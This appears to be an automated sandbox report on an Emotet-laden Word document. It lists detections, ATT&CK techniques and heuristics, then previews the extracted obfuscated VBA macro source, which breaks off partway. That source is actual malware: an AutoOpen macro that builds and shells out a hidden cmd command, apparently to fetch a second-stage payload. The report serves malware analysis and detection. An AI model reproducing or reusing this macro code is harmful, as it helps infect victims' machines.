Verdict: MALICIOUS
Risk Score: 142

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros, specifically an AutoOpen macro, which is a common characteristic of Emotet. The AutoOpen macro is designed to execute obfuscated code that likely downloads and runs a secondary payload. The ClamAV detection explicitly identifies it as Doc.Downloader.Emotet.
Heuristics (5)

- ClamAV: Doc.Downloader.Emotet-6787869-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6787869-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main: in document text (OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11596 bytes | 8ee9cd36360acbb943f6df887635fd874a6abfe4d5a31f110830832408e467f2 |
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "jKoJTiHJWESm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Sgn(zvmAGf)
TypeName 273
TypeName CBool(QpZmP)
TypeName CByte(lAUaGi)
TypeName Log(qRKzr)
Shell@ KeyString(vbKeyC) + zszkGupTJUJ + fAWnlRtSDYY + zdzFzf + Ljsbi + ThbabuGi + oOAiIMcO + HnTRAdVipt + OjawniTzCKd + wELqEKiAW + YCmUOQrBfR + zKtJkKZPboDU + UafSIoziOfGWpj, 267501602 - 267501602
TypeName CDbl(62)
TypeName wlGNf
TypeName 291
End Sub
Attribute VB_Name = "bbEwSbp"
Function zdzFzf()
On Error Resume Next
TypeName Hex(97104 + NXPCi)
TypeName lHSjj
riuNqtnCPuh = "md " + "/" + "V:O" + "/C" + CStr(Chr(SYpcnZA + MdKsNDNz + 34 + btzSpJE + lHSMjCprHlS)) + "se"
TypeName CBool(WoNNhX)
TypeName ChrW(oIbipv)
DaHZGO = "t " + ". " + "=m" + "Em" + "Ji" + "aj" + "In" + "PNs" + "vL" + "L" + "jLV" + "fkp"
TypeName CBool(MwdDKG / 8799)
TypeName ZzvXF
TypeName Rnd(90)
LUOOrZuj = "fi" + "v5=" + "/" + "c" + "zxd" + "lY"
TypeName kPfqI
TypeName CBool(63)
nWWXGrzjdS = ";'" + "t0}" + "@" + "4G" + "w)("
TypeName CByte(WjpcJK)
TypeName 669
TypeName Sgn(tkkqVB / fjiiQ + nAczW + LhJloo)
lCZXfAJj = "M\b" + "31W" + "T" + "8rF" + "-D:" + "{" + "S" + "o" + "h"
zdzFzf = riuNqtnCPuh + DaHZGO + LUOOrZuj + nWWXGrzjdS + lCZXfAJj
TypeName Cos(SEzPD * mXCNkz)
TypeName HCDbY
TypeName 1914
End Function
Function Ljsbi()
On Error Resume Next
TypeName CSng(HGkmZW * jQTsCF)
TypeName CDate(XaJwoC - rsHAt)
jjTajD = " u" + "e" + "C7+" + ".gy" + ",$Q" + "&&f" + "o" + "r" + " %S"
TypeName ChrB(bJMKM)
TypeName tfDjf
RdJDjN = " " + "i" + "n " + "(" + "20" + ";" + "59;" + "41" + ";6" + "3" + ";"
TypeName CStr(ioJdN)
TypeName Sqr(uiOUq)
TypeName CSng(6116 + XduGzN / 43421 / jrKpEm)
AWAAzFjKni = "5" + "2;" + "1" + "1" + ";60" + ";6" + "3;" + "3" + "1;" + "31;" + "61;" + "71"
TypeName ChrB(378051836)
TypeName JQufbM
DIEuY = ";50" + ";8;" + "64" + ";" + "25;" + "8;" + "63" + ";41" + ";5" + "4"
TypeName 6744
TypeName Log(220364817)
VnLlrFu = ";" + "5" + "9" + ";" + "46;"
TypeName Sqr(2296)
TypeName ChrW(ScWXPK)
jAGbwNjlN = "15" + ";63" + ";27" + ";" + "35" + ";"
TypeName Rnd(UEPBZ)
TypeName GpPQSq
FpBQZAz = "6" + "1" + ";" + "10;" + "63" + ";35" + ";" + "67" + ";49" + ";6" + "3" + ";"
TypeName Sgn(6)
TypeName Sqr(nCXhL / lZLLm - 10724 * BMFPhn)
SUfipPFApD = "46;" + "64" + ";" + "31;" + "2" + "2" + ";" + "6" + "3" + ";8" + ";35"
TypeName CStr(34325 + NQuWP / LWmDqE / DiLTs)
TypeName UwABr
MvcKqOmpUzF = ";" + "3" + "3;7" + "1;" + "49;" + "3" + ";7" + ";2" + "5;" + "34" + ";6"
TypeName Int(3)
TypeName CDbl(QJrdD)
TypeName CStr(9)
bjtILquhm = "0;3" + "5;3" + "5;" + "2" + "0;" + "56" + ";" + "26" + ";26" + ";41"
TypeName Hex(20821 * 94515 * pIouEh * UdnzKm)
TypeName Cos(luZKUI)
TypeName CLng(BtJZoD / zGDKBm / rSQRo / zNjKrA)
QjNBSdHu = ";" + "4" + "1;" + "41" + ";6" + "7;" + "46;" + "22;" + "59;" + "21" + ";52" + ";63" + ";1"
TypeName Sgn(aIFnkO)
TypeName Rnd(JwdWW)
TypeName Chr(unNwho - zLLiA + 62313 + hhVmcj)
qIZBzwUaASf = "1;2" + "7;5" + "9;" + "6" + "7;" + "2" + "7" + ";" + "59" + ";2;" + "6" + "7;2"
TypeName Fix(qqiOVK * TSlDY - 23387 / PjjXqb)
TypeName Chr(ozGRpz)
TypeName wAqpis
uaHziJjuSwG = ";2" + "9;" + "26;" + "46;" + "22;" + "38;" + "60" + ";3" + "5;3" + "5"
Ljsbi = jjTajD + RdJDjN + AWAAzFjKni + DIEuY + VnLlrFu + jAGbwNjlN + FpBQZAz + SUfipPFApD + MvcKqOmpUzF + bjtILquhm + QjNBSdHu + qIZBzwUaASf + uaHziJjuSwG
TypeName lINzu
TypeName Sin(RvviW)
End Function
Function ThbabuGi()
On Error Resume Next
TypeName OAsKA
TypeName CInt(AmUMT * bwcEz)
TypeName Log(67191 - liWWzo - 59621 / sjaiS)
vjSVOFlCtF = ";20" + ";5" + "6;2" + "6" + ";26" + ";4" + "6;" + "59;" + "2" + "9;" + "4" + "6;" + "62"
TypeName CLng(74958799)
TypeName ThXcQa
```

... (truncated)